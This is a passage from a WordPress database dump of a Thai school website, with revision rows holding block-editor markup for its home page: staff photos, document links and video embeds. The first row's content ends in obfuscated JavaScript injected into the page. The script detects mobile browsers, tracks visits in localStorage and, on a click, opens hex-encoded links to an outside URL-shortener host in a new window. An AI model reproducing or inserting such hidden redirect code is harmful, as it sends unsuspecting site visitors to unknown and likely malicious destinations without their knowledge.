|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 14:44:19','2025-06-27 07:44:19','',19,'http://watprato.ssk.in.th/?p=564',0,'revision','',0),
(566,1,'2025-06-27 14:47:22','2025-06-27 07:47:22','','483858906_122214558428202781_582783627217107479_n','','inherit','open','closed','','483858906_122214558428202781_582783627217107479_n-2','','','2025-06-27 14:47:22','2025-06-27 07:47:22','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1.jpg',0,'attachment','image/jpeg',0),
(567,1,'2025-06-27 14:47:27','2025-06-27 07:47:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtu.be/C9do6YkaRVU?si=6QeXpJR-PUh7xatA\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/LVfYUq7zwYQ?si=PRL0_feQTmuxz4ZK\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" 